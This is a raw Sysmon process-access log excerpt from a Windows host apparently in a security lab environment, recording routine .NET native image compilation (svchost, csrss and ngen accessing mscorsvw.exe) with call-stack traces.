13:50:08.510{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9210-6005-A703-00000000A301}220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.494{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9210-6005-A703-00000000A301}220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.494{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9210-6005-A703-00000000A301}220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.447{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9210-6005-A603-00000000A301}3432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.431{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9210-6005-A603-00000000A301}3432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.431{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9210-6005-A603-00000000A301}3432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.353{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9210-6005-A503-00000000A301}2752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.338{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9210-6005-A503-00000000A301}2752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.338{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9210-6005-A503-00000000A301}2752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.291{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9210-6005-A403-00000000A301}1184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.291{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9210-6005-A403-00000000A301}1184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.291{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9210-6005-A403-00000000A301}1184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.228{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9210-6005-A303-00000000A301}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.213{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9210-6005-A303-00000000A301}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.213{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9210-6005-A303-00000000A301}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.181{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9210-6005-A203-00000000A301}3528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.166{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9210-6005-A203-00000000A301}3528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.166{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9210-6005-A203-00000000A301}3528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.119{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9210-6005-A103-00000000A301}2232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.119{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9210-6005-A103-00000000A301}2232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.119{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9210-6005-A103-00000000A301}2232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.994{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920F-6005-A003-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:09.884{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9211-6005-AC03-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 